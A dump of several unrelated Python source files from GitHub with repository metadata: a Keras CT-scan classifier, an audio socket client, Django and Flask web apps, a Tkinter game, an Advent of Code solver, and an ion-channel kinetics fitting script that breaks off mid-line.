detection!\n\"\"\"\n\nimport logging\nimport os\n\nimport keras\nimport matplotlib\nimport numpy as np\nfrom keras.layers import Conv2D, MaxPooling2D, Flatten, Dense\nfrom keras.models import Sequential, model_from_json\nfrom skimage.transform import downscale_local_mean\n\nmatplotlib.use('Agg')\n# noinspection PyPep8\nimport matplotlib.pyplot as plt\n\n\n# noinspection PyMethodMayBeStatic,PyMethodMayBeStatic,PyMethodMayBeStatic\nclass Algorithm(object):\n \"\"\" This contains the details of our solution, intended to be largely\n isolated from other infra-structure issues. \"\"\"\n\n def __init__(self, cache_dir=None):\n \"\"\" Optionally pass a directory (full path) which the algorithm can use\n for caching results (e.g. preprocessing) between invocations.\"\"\"\n self.history = None # Will keep a plot of accuracy by epoch\n self.cache_dir = cache_dir\n self.preprocessing_cache_dir = None\n if cache_dir:\n self.preprocessing_cache_dir = os.path.join(cache_dir, 'preprocessing')\n os.makedirs(self.preprocessing_cache_dir, exist_ok=True)\n\n # Class level constants\n downsample_factor = (4, 4)\n imshape = tuple(512 // dsf for dsf in downsample_factor) # e.g. (128, 128)\n\n def _preprocess_one_dicom(self, dcm):\n \"\"\" Return a nicely normalised numpy float32 image \"\"\"\n raw_image = dcm.pixel_array\n\n # print(raw_image.dtype)\n slope = dcm.data_element('RescaleSlope').value\n intercept = dcm.data_element('RescaleIntercept').value\n\n image = np.array(raw_image, dtype=np.float32)\n image = image * slope + intercept\n image = np.array(image, dtype=np.float32)\n\n # It seems that padding value lies! 
So we'll just clamp image values and hope for the best!\n # logging.debug(\"Image (min,max) = (%6.1f, %6.1f)\", np.min(image), np.max(image))\n clip_min = -200.0\n clip_max = 1000.0\n image[image < clip_min] = clip_min\n image[image > clip_max] = clip_max\n\n assert np.min(image) >= clip_min\n assert np.max(image) <= clip_max\n\n # Finally, downscale !\n\n image = downscale_local_mean(image, Algorithm.downsample_factor)\n\n return image\n\n def preprocessed_images(self, cohort):\n \"\"\" Apply preprocessing - mainly conversion to HU \"\"\"\n\n def cached_preprocess_one_dicom(ix):\n if not self.preprocessing_cache_dir:\n # If we have no cache, have to compute and be done.\n return self._preprocess_one_dicom(cohort.dicoms[ix])\n\n id_ = cohort.ids[ix]\n cached_file_name = os.path.join(self.preprocessing_cache_dir, id_ + '.npy')\n if os.path.exists(cached_file_name):\n logging.info(\"Using preprocessing cache...\")\n image = np.load(cached_file_name)\n else:\n logging.info(\"Preprocessing...\")\n image = self._preprocess_one_dicom(cohort.dicoms[ix])\n np.save(cached_file_name, image)\n return image\n\n # Trick to ensure we only show a logging message once.\n dup_filter = DuplicateFilter()\n logging.getLogger().addFilter(dup_filter)\n result = [cached_preprocess_one_dicom(ix) for ix in range(cohort.size)]\n logging.getLogger().removeFilter(dup_filter)\n return result\n\n def train(self, cohort):\n \"\"\" Train on the given training cohort (already split from test)\n This includes pre-processing. Return the trained model\"\"\"\n\n # Preprocess - two phases a) -> HU, b) reshape and scale.\n x_data = self.data_scaling(self.preprocessed_images(cohort))\n y_data = keras.utils.to_categorical(cohort.groundtruth, 2)\n\n # Build the model\n model = self.build_model()\n model.compile(\n loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adam(),\n metrics=['accuracy'])\n self.history = AccuracyHistory()\n\n # Train and save the model\n model.fit(\n x_data, y_data,\n batch_size=20, shuffle=True, epochs=15, verbose=0,\n validation_split=0.2, callbacks=[self.history])\n\n model.summary(print_fn=logging.debug)\n\n return model\n\n def predict(self, model, cohort):\n # Preprocess\n x_data = self.data_scaling(self.preprocessed_images(cohort))\n\n # Run the model\n predictions = model.predict_classes(x_data)\n\n return predictions\n\n def data_scaling(self, images):\n \"\"\"\n Given a list of pre-processed images (e.g. from PreprocessedCohort.images) perform\n intensity scaling and reshaping, returning a 4D tensor (n, x, y, 1) ready for feeding\n to a network\n \"\"\"\n siz = images[0].shape\n x_data = np.array(images).reshape(-1, siz[0], siz[1], 1)\n x_data = x_data.astype(np.float32)\n x_data = (x_data + 100) / 150.0\n # mean, sd = np.mean(x_data), np.std(x_data)\n # min_, max_ = np.min(x_data), np.max(x_data)\n # print(\"data_scaling: shape:\", x_data.shape, \"min,max:\",\n # (min_, max_), \"mean,sd:\", (mean, sd))\n\n return x_data\n\n def build_model(self):\n input_shape = Algorithm.imshape + (1,) # e.g. 
(128, 128, 1)\n model = Sequential()\n model.add(Conv2D(8, kernel_size=(3, 3), strides=(1, 1), activation='relu',\n input_shape=input_shape))\n model.add(MaxPooling2D(pool_size=(3, 3)))\n model.add(Conv2D(8, (3, 3), strides=(1, 1), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Flatten())\n model.add(Dense(10, activation='relu'))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(2, activation='softmax'))\n\n return model\n\n @staticmethod\n def save_model(model, fname):\n \"\"\" Save model and wieghts to fname and fname.h5 files respectively\n fname can include a directory which will be created if it doesn't exist\"\"\"\n\n directory = os.path.dirname(fname)\n if directory and not os.path.isdir(directory):\n logging.warning(\"Creating directory %s\" % directory)\n os.makedirs(directory)\n\n model_json = model.to_json()\n with open(fname + '.json', 'w') as json_file:\n json_file.write(model_json)\n model.save_weights(fname + '.h5')\n logging.info(\"Model saved to %s[.json,.h5] files\", fname)\n\n @staticmethod\n def load_model(fname):\n \"\"\" Load a model from fname.json and fname.h5, and return it.\n (Note that the loaded model must be compiled before use)\"\"\"\n # load json and create model\n json_file = open(fname + '.json', 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n loaded_model = model_from_json(loaded_model_json)\n # load weights into new model\n loaded_model.load_weights(fname + '.h5')\n print(\"Loaded model from %s[.json,.h5] files\" % fname)\n return loaded_model\n\n\nclass AccuracyHistory(keras.callbacks.Callback):\n \"\"\" Record and plot training progress \"\"\"\n\n def __init__(self):\n super().__init__()\n self.acc = []\n self.val_acc = []\n\n def on_train_begin(self, logs=None):\n self.acc = []\n self.val_acc = []\n\n def on_epoch_end(self, epoch, logs=None):\n self.acc.append(logs.get('acc'))\n self.val_acc.append(logs.get('val_acc'))\n\n def plot_training(self, save_file_path):\n epochs = range(1, len(self.acc) + 1)\n plt.figure()\n plt.plot(epochs, self.acc, label='Train')\n plt.plot(epochs, self.val_acc, label='Validation')\n plt.ylim(0.0, 1.0)\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend()\n\n if save_file_path is not None:\n _, extension = os.path.splitext(save_file_path)\n assert extension in ('.png', '.jpeg')\n plt.savefig(save_file_path)\n plt.show()\n else:\n plt.show()\n\n\nclass DuplicateFilter(object):\n \"\"\" A logging filter to remove duplicates. 
(Used in preprocessing method)\"\"\"\n\n def __init__(self):\n self.msgs = set()\n\n def filter(self, record):\n rv = record.msg not in self.msgs\n self.msgs.add(record.msg)\n return rv\n","repo_name":"danielphil/kaggle_ctmi","sub_path":"kaggle_ctmi/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":8373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"42501765547","text":"import os\nimport pyaudio\nimport wave\nimport socket\nimport time\nimport pickle \n\nCHUNK = 1024\nCHANNELS = 2\nFORMAT = pyaudio.paInt16\nRATE = 44100\n\n\ndef playback_data(data, p):\n \n input('Press enter >> ')\n\n stream = p.open(format=p.get_format_from_width(data.getsampwidth()),\n channels=data.getnchannels(),\n rate=data.getframerate(),\n output=True)\n\n audio = data.readframes(CHUNK)\n\n while audio != '':\n stream.write(audio)\n audio = data.readframes(CHUNK)\n if len(audio) <= 0:\n break\n stream.stop_stream()\n stream.close()\n\n p.terminate()\n data.close()\n print('Complete!')\n print('Reconnecting to server.')\n time.sleep(2)\n\n\n\n\n\n\ndef main():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect(('10.42.0.24', 2348))\n\n while True:\n\n full_msg = b''\n new_msg = True\n\n while True:\n msg = s.recv(1024)\n if new_msg:\n print('Received:',msg[:CHUNK])\n msglen = int(msg[:CHUNK])\n new_msg = False\n\n full_msg += msg\n\n print(len(full_msg))\n\n if len(full_msg)-CHUNK == msglen:\n print('Received audio.')\n print(full_msg[CHUNK:])\n data = pickle.loads(full_msg[CHUNK:])\n data = list(data.values())\n data = b''.join(data)\n p = pyaudio.PyAudio()\n os.system('clear')\n wf = wave.open('data.wav', 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(data)\n wf.close()\n\n\n FILE = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data.wav')\n\n data = wave.open(FILE, 'rb')\n playback_data(data, p)\n \n new_msg = True\n full_msg = b\"\"\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"ZodinDevelopment/AudioHive","sub_path":"Playback_Client/basic_cli_wire.py","file_name":"basic_cli_wire.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12977076058","text":"from django.urls import path,include\nfrom . 
import views\n\napp_name=\"administration\"\n\nurlpatterns=[\n path(\"AccessDenied/\",views.AccessDenied,name=\"AccessDenied\"),\n path(\"\",views.index,name=\"index\"),\n path(\"verify_sellers/\",views.verify_sellers,name=\"verify_sellers\"),\n]\n","repo_name":"KeepCoding365days/TechMaze","sub_path":"administration/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20041892999","text":"from rest_framework import status, viewsets, permissions\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom api.models import Author\nfrom api.serializers import AuthorSerializer\nfrom api.utils import methods, author_not_found\nfrom api.paginaion import CustomPagiantor\nfrom api.utils import invalid_user_view\n\nfrom django.shortcuts import redirect, render\n\n\n\"\"\" put request data into instance \nexample of an working data:\n\n{\n \"displayName\": \"the name\",\n \"github\": \"https://uofa-cmput404.github.io/\"\n}\n\n\"\"\"\ndef all_authors_view(request):\n # Check the user is invalid in view\n if invalid_user_view(request):\n return redirect(\"login\")\n\n content = {}\n content['all_authors'] = True\n\n return render(request, \"all_authors.html\", content)\n\n\nclass AuthorsViewSet(viewsets.GenericViewSet):\n\n permission_classes = [permissions.IsAuthenticated]\n\n \"\"\"\n URL: api/authors/\n GET: retrieve all profiles on the server paginated\n \"\"\"\n @action(methods=[methods.GET], detail=True)\n def list_all(self, request):\n\n queryset = Author.objects.all()\n pagination = CustomPagiantor()\n qs = pagination.paginate_queryset(queryset, request)\n serializer = AuthorSerializer(qs, many=True)\n res = {\n \"type\": \"authors\",\n \"items\": serializer.data\n }\n return Response(res, status=status.HTTP_200_OK)\n \n # Return the total number of authors\n @action(methods=[methods.GET], detail=True)\n def get_num_of_authors(self, request):\n total = Author.objects.all().count()\n res = {\"total_item\": total}\n return Response(res, status=status.HTTP_200_OK)\n\n\nclass ProfileViewSet(viewsets.ViewSet):\n\n permission_classes = [permissions.IsAuthenticated]\n\n \"\"\"\n URL: api/author/{authorID}/\n GET: retrieve their profile\n POST: update profile\n \"\"\"\n @action(methods=[methods.GET], detail=True)\n def retrieve(self, request, authorID):\n if author_not_found(authorID):\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n author = Author.objects.get(authorID=authorID)\n serializer = AuthorSerializer(author)\n return Response(serializer.data)\n\n @action(methods=[methods.POST], detail=True)\n def update(self, request, authorID):\n if author_not_found(authorID):\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = AuthorSerializer(data=request.data)\n if serializer.is_valid():\n instance = Author.objects.get(authorID=authorID)\n self.populate_author_data(serializer.data, instance)\n return Response(AuthorSerializer(instance).data, status=status.HTTP_200_OK)\n else:\n # return 400 response if the data was invalid/missing require field\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n def populate_author_data(self, data, instance):\n instance.displayName = data[\"displayName\"]\n instance.github = data[\"github\"]\n 
instance.save()\n","repo_name":"GraceFu/CMPUT404-F21-Project","sub_path":"api/views/authors.py","file_name":"authors.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"25833401128","text":"from tkinter import*\r\nventana=Tk()\r\nventana.title(\"BLOQUES DE COLOR\")\r\nventana.geometry(\"350x350\")\r\n\r\nglobal r,c\r\nr=2\r\nc=3\r\n\r\ndef mtx():\r\n global r,c\r\n\r\n for x in [1,2,3,4,5]:\r\n for y in [0,1,2,3,4]:\r\n\r\n A=Button(ventana, text=\" \", bg=\"gray\", height=2, width=4)\r\n A.grid(column=x, row=y)\r\n\r\n\r\n S=Button(ventana, text=\"S\", bg=\"red\", height=2, width=4)\r\n S.grid(column=c, row=r)\r\n\r\ndef izquierda():\r\n global c\r\n if (c==1):\r\n c=5\r\n else:\r\n c=c-1\r\n mtx()\r\n \r\ndef arriba():\r\n global r\r\n if (r==0):\r\n r=4\r\n else:\r\n r=r-1\r\n mtx()\r\n \r\ndef abajo():\r\n global r\r\n if (r==4):\r\n r=0\r\n else:\r\n r=r+1\r\n mtx()\r\n \r\ndef derecha():\r\n global c\r\n if (c==5):\r\n c=1\r\n else:\r\n c=c+1\r\n mtx()\r\n\r\n\r\nIzq=Button(ventana, text=\"🢀\", bg=\"green\", height=2, width=4, command=izquierda)\r\nIzq.grid(column=6, row=0)\r\n\r\nAr=Button(ventana, text=\"🢁\", bg=\"orange\", height=2, width=4, command=arriba)\r\nAr.grid(column=8, row=0)\r\n\r\nAb=Button(ventana, text=\"🢃\", bg=\"yellow\", height=2, width=4, command=abajo)\r\nAb.grid(column=7, row=0)\r\n\r\nDer=Button(ventana, text=\"🢂\", bg=\"brown\", height=2, width=4, command=derecha)\r\nDer.grid(column=9, row=0)\r\nmtx()\r\n\r\nventana.mainloop()\r\n\r\n","repo_name":"GARS23-s/JUEGO-DEL-BLOQUE","sub_path":"BLOQUES DE COLORES P2.py","file_name":"BLOQUES DE COLORES P2.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20066027508","text":"from collections import namedtuple\nfrom typing import NamedTuple\n\nFold = namedtuple('Fold', 'axis loc')\nDot = namedtuple('Dot', 'x y')\n\n#file_to_use = 'day13/day13-sample.txt'\nfile_to_use = 'day13/day13-input.txt'\n\ngrid = set()\nfolds = []\n\nwith open(file_to_use) as f:\n l = f.readline().strip()\n while l != '':\n x, y = l.split(',')\n grid.add(Dot(int(x), int(y)))\n l = f.readline().strip()\n l = f.readline().strip()\n while l != '':\n axis,loc = l.split('=')\n folds.append(Fold(axis[-1], int(loc)))\n l = f.readline().strip()\n\n# for 13-1, we do one fold, for 13-2 we do all of them\nfor fold in folds:\n for dot in frozenset(grid):\n if fold.axis == 'x' and dot.x > fold.loc or fold.axis == 'y' and dot.y > fold.loc:\n grid.remove(dot)\n if fold.axis == 'x':\n grid.add(Dot((fold.loc - dot.x) + fold.loc, dot.y))\n if fold.axis == 'y':\n grid.add(Dot(dot.x, (fold.loc - dot.y) + fold.loc))\n\nfor y in range(10):\n line = [' ' for i in range(40)]\n for dot in filter(lambda x : x.y == y, grid):\n line[dot.x] = '*'\n print(''.join(line))","repo_name":"ChrisGwinn/adventofcode2021","sub_path":"day13/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16770357944","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Attendance',\n 
fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Meeting',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50)),\n ('date', models.DateTimeField(auto_now_add=True)),\n ('present', models.ManyToManyField(to=settings.AUTH_USER_MODEL, through='attendance.Attendance')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='attendance',\n name='meeting',\n field=models.ForeignKey(to='attendance.Meeting'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='attendance',\n name='user',\n field=models.ForeignKey(to=settings.AUTH_USER_MODEL),\n preserve_default=True,\n ),\n migrations.AlterUniqueTogether(\n name='attendance',\n unique_together=set([('user', 'meeting')]),\n ),\n ]\n","repo_name":"siggame/auditor","sub_path":"auditor/attendance/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32653930923","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_bootstrap import Bootstrap\nfrom flask_sqlalchemy import SQLAlchemy\nfrom forms import BooksForm, EditForm\nimport os\n\napp = Flask(__name__)\n# database object\nSECRET_KEY = os.urandom(32)\napp.config['SECRET_KEY'] = SECRET_KEY\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///books_database.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n# open/create a cursor object\ndb = SQLAlchemy(app)\nBootstrap(app)\n\n\n# creating a class to handle tables in the DB\nclass Books(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(250), unique=True, nullable=False)\n author = db.Column(db.String(250), nullable=False)\n rating = db.Column(db.Float, nullable=False)\n\n def __repr__(self):\n return '' % self.title % self.author % self.rating\n\n\ndb.create_all()\n\n\n@app.route('/')\ndef home():\n # get the books from BOOKS object(database object)\n all_books = db.session.query(Books).all()\n return render_template('index.html', all_books=all_books)\n\n\n@app.route(\"/add\", methods=[\"GET\", \"POST\"])\ndef add():\n form = BooksForm()\n if form.validate_on_submit() and request.method == 'POST':\n # get the data from the form using \"data\" on form object\n new_book = Books(title=form.title.data, author=form.author.data, rating=form.rating.data)\n db.session.add(new_book)\n db.session.commit()\n return redirect(url_for('home'))\n return render_template('add.html', form=form)\n\n\n@app.route('/edit_rating/', methods=['GET', 'POST'])\ndef edit_rating():\n form = EditForm()\n if form.validate_on_submit() and request.method == \"POST\":\n book_id = request.args.get(\"edit_book_id\")\n update_book = Books.query.get(book_id)\n update_book.rating = request.form[\"rating\"]\n db.session.commit()\n return redirect(url_for(\"home\"))\n book_id = request.args.get(\"id\")\n book = Books.query.get(book_id)\n return render_template('edit_rating.html', edit_form=form)\n\n\n@app.route('/delete_book/', methods=['GET'])\ndef delete_book():\n book_id = request.args.get('del_book_id')\n del_book = Books.query.get(book_id)\n db.session.delete(del_book)\n db.session.commit()\n return 
redirect(url_for('home'))\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"rajverma1985/blog-with-users-start","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11359062409","text":"import sys\nimport math\nimport numpy as np\nimport pandas as pd\nimport argparse\nimport re\nimport os\nimport matplotlib.pyplot as plt\n\nfrom scipy.optimize import minimize\nfrom dcpyps import dataset\nfrom dcpyps import mechanism\nfrom dcprogs.likelihood import Log10Likelihood\nfrom scalcs import scalcslib as scl\nfrom scalcs import scplotlib as scpl\n\n\n\ndef dcprogslik(x):\n mec.theta_unsqueeze(np.exp(x))\n mec.set_eff('c', 100e-9)\n return -likelihood(mec.Q) * logfac\n\ndef printiter(theta):\n global iternum\n iternum += 1\n lik = dcprogslik(theta)\n if iternum % 10 == 0:\n print(\"iteration # {0:d}; log-lik = {1:.6f}\".format(iternum, -lik))\n print(np.exp(theta))\n\ndef mechanism_RO(rates):\n\n o = mechanism.State('A', 'F*', 50e-12)\n r = mechanism.State('B', 'R', 0.0)\n\n rate_list = [\n mechanism.Rate(rates[1], o, r, name='alpha', limits=[1e-15, 1e+7]),\n mechanism.Rate(rates[0], r, o, name='beta', limits=[1e-15, 1e+7]),\n ]\n\n complete_mechanism = mechanism.Mechanism(rate_list, mtitle='CO', rtitle='CO_rates')\n complete_mechanism.set_eff('c', 100e-9)\n\n return complete_mechanism\n\ndef mechanism_RFO(rates):\n\n o = mechanism.State('A', 'F*', 50e-12)\n f = mechanism.State('B', 'F', 0.0)\n r = mechanism.State('C', 'R', 0.0)\n\n rate_list = [\n mechanism.Rate(rates[3], o, f, name='alpha', limits=[1e+0, 1.5e+4]),\n mechanism.Rate(rates[2], f, o, name='beta', limits=[1e+0, 1.5e+4]),\n mechanism.Rate(rates[1], f, r, name='gamma', limits=[1e+0, 1.5e+4]),\n mechanism.Rate(rates[0], r, f, name='delta', limits=[1e+0, 1.5e+4])\n ]\n\n complete_mechanism = mechanism.Mechanism(rate_list, mtitle='CFO', rtitle='CFO_rates')\n complete_mechanism.set_eff('c', 100e-9)\n\n return complete_mechanism\n\ndef mechanism_CFOODD(rates):\n\n c = mechanism.State('B', 'A2R', 0.0)\n f = mechanism.State('B', 'A2F', 0.0)\n o = mechanism.State('A', 'A2O', 50e-12)\n op = mechanism.State('A', 'A2Op', 50e-12)\n d = mechanism.State('C', 'A2D', 0.0)\n dp = mechanism.State('C', 'A2Dp', 0.0)\n\n rate_list = [\n mechanism.Rate(rates[0], f, o, name='beta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[1], f, op, name='betap', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[2], o, f, name='alpha', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[3], op, f, name='alphap', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[4], c, f, name='delta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[5], f, c, name='gamma', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[6], f, d, name='d', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[7], f, dp, name='dp', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[8], d, f, name='r', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[9], dp, f, name='rp', limits=[1e0, 1.5e4])\n ]\n\n complete_mechanism = mechanism.Mechanism(rate_list, mtitle='CFOODD', rtitle='CFOODD_rates')\n # complete_mechanism.set_eff('c', 100e-9)\n\n return complete_mechanism\n\ndef mechanism_CFOOD(rates):\n\n c = mechanism.State('B', 'A2R', 0.0)\n f = mechanism.State('B', 'A2F', 0.0)\n o = mechanism.State('A', 'A2O', 50e-12)\n op = mechanism.State('A', 'A2Op', 50e-12)\n d = mechanism.State('C', 'A2D', 0.0)\n\n rate_list = [\n mechanism.Rate(rates[0], f, o, name='beta', limits=[1e0, 1.5e4]),\n 
mechanism.Rate(rates[1], f, op, name='betap', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[2], o, f, name='alpha', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[3], op, f, name='alphap', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[4], c, f, name='delta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[5], f, c, name='gamma', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[6], f, d, name='d', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[7], d, f, name='r', limits=[1e0, 1.5e4]),\n ]\n\n complete_mechanism = mechanism.Mechanism(rate_list, mtitle='CFOODD', rtitle='CFOODD_rates')\n # complete_mechanism.set_eff('c', 100e-9)\n\n return complete_mechanism\n\ndef mechanism_CFOD(rates):\n\n c = mechanism.State('B', 'A2R', 0.0)\n f = mechanism.State('B', 'A2F', 0.0)\n o = mechanism.State('A', 'A2O', 50e-12)\n d = mechanism.State('C', 'A2D', 0.0)\n\n rate_list = [\n mechanism.Rate(rates[0], f, o, name='beta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[1], o, f, name='alpha', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[2], c, f, name='delta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[3], f, c, name='gamma', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[4], f, d, name='d', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[5], d, f, name='r', limits=[1e0, 1.5e4]),\n ]\n\n complete_mechanism = mechanism.Mechanism(rate_list, mtitle='CFOODD', rtitle='CFOODD_rates')\n # complete_mechanism.set_eff('c', 100e-9)\n\n return complete_mechanism\n\ndef mechanism_CFOO(rates):\n\n c = mechanism.State('B', 'A2R', 0.0)\n f = mechanism.State('B', 'A2F', 0.0)\n o = mechanism.State('A', 'A2O', 50e-12)\n op = mechanism.State('A', 'A2Op', 50e-12)\n\n rate_list = [\n mechanism.Rate(rates[0], f, o, name='beta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[1], f, op, name='betap', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[2], o, f, name='alpha', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[3], op, f, name='alphap', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[4], c, f, name='delta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[5], f, c, name='gamma', limits=[1e0, 1.5e4]),\n ]\n\n complete_mechanism = mechanism.Mechanism(rate_list, mtitle='CFOODD', rtitle='CFOODD_rates')\n # complete_mechanism.set_eff('c', 100e-9)\n\n return complete_mechanism\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--config')\nargs = parser.parse_args()\n\nconfig = pd.read_csv(args.config)\nproject = '_'.join(re.split('[_,.]', args.config)[2:-1])\nresults = []\n\nfor file_name in config.file.unique():\n\n single_cell = config[config.loc[:, 'file'] == file_name].copy()\n single_cell.reset_index(inplace=True)\n\n sc_model = single_cell.at[0, 'model']\n sc_type = single_cell.at[0, 'type']\n sc_tres = (single_cell.at[0, 'tres']/1000000)\n sc_tcrit = (single_cell.at[0, 'tcrit']/1000)\n\n # TODO: some integration with real data validation\n # experimental event times, for further analysis, works only for CFO\n # needs to be in a config file, not supported by fit_HJCFIT_config.py\n if sc_model == 'CFO':\n sc_t1_exp = single_cell.at[0, 't1_exp']\n sc_t2_exp = single_cell.at[0, 't2_exp']\n sc_p1_exp = single_cell.at[0, 'p1_exp']\n sc_p2_exp = single_cell.at[0, 'p2_exp']\n # end\n\n sc_scns = list(single_cell.loc[:, 'file_scn'])\n sc_scns = [name if name.endswith('.SCN') else name + '.SCN' for name in sc_scns]\n print(sc_scns)\n\n checked_scns = []\n for scn in sc_scns:\n if scn in (os.listdir()):\n print('SCN file found {}.'.format(scn))\n checked_scns.append(scn)\n elif scn.upper() in (os.listdir()):\n print('SCN file found {}, changing to 
uppercase.'.format(scn))\n up_scn = scn.upper()\n checked_scns.append(up_scn)\n else:\n print('SCN file not found {}.'.format(scn))\n\n rec = dataset.SCRecord(checked_scns, 100e-9, sc_tres, sc_tcrit)\n rec.record_type = 'recorded'\n rec.printout()\n\n if sc_model == 'CO':\n mec = mechanism_RO([single_cell.at[0, 'beta'], single_cell.at[0, 'alpha']])\n elif sc_model == 'CFO':\n mec = mechanism_RFO([single_cell.at[0, 'delta'], single_cell.at[0, 'gamma'],\n single_cell.at[0, 'beta'], single_cell.at[0, 'alpha']])\n elif sc_model == 'CFOO':\n mec = mechanism_CFOO([single_cell.at[0, 'beta'], single_cell.at[0, 'betap'],\n single_cell.at[0, 'alpha'], single_cell.at[0, 'alphap'],\n single_cell.at[0, 'delta'], single_cell.at[0, 'gamma']])\n elif sc_model == 'CFOOD':\n mec = mechanism_CFOOD([single_cell.at[0, 'beta'], single_cell.at[0, 'betap'],\n single_cell.at[0, 'alpha'], single_cell.at[0, 'alphap'],\n single_cell.at[0, 'delta'], single_cell.at[0, 'gamma'],\n single_cell.at[0, 'd'],\n single_cell.at[0, 'r']])\n elif sc_model == 'CFOD':\n mec = mechanism_CFOOD([single_cell.at[0, 'beta'],\n single_cell.at[0, 'alpha'],\n single_cell.at[0, 'delta'], single_cell.at[0, 'gamma'],\n single_cell.at[0, 'd'],\n single_cell.at[0, 'r']])\n elif sc_model == 'CFOODD':\n mec = mechanism_CFOODD([single_cell.at[0, 'beta'], single_cell.at[0, 'betap'],\n single_cell.at[0, 'alpha'], single_cell.at[0, 'alphap'],\n single_cell.at[0, 'delta'], single_cell.at[0, 'gamma'],\n single_cell.at[0, 'd'], single_cell.at[0, 'dp'],\n single_cell.at[0, 'r'], single_cell.at[0, 'rp']])\n\n mec.update_mr()\n mec.printout(sys.stdout)\n theta = mec.theta()\n\n bursts = rec.bursts.intervals()\n logfac = math.log(10)\n print('\\nFirst likelihood calculation ...')\n print(sc_tres, sc_tcrit)\n likelihood = Log10Likelihood(bursts, mec.kA, sc_tres, sc_tcrit)\n\n print('\\nFirst iter ...')\n iternum = 0\n\n print(\"Minimizing starts\")\n res = minimize(dcprogslik, np.log(theta), method='Nelder-Mead', callback=printiter, )\n\n print('xout', res.x)\n mec.theta_unsqueeze(np.exp(res.x))\n print(\"\\n Final rate constants:\")\n mec.printout(sys.stdout)\n lik = dcprogslik(res.x)\n print(\"\\nFinal likelihood = {0:.6f}\".format(-lik))\n\n # plot and event times of shuts, works only for CFO model\n if sc_model == 'CFO':\n print(scl.printout_distributions(mec, sc_tres))\n shuts = scl.printout_distributions(mec, sc_tres)\n\n t1_mod = shuts.splitlines()[10].split('\\t')[1]\n p1_mod = shuts.splitlines()[10].split('\\t')[2]\n t2_mod = 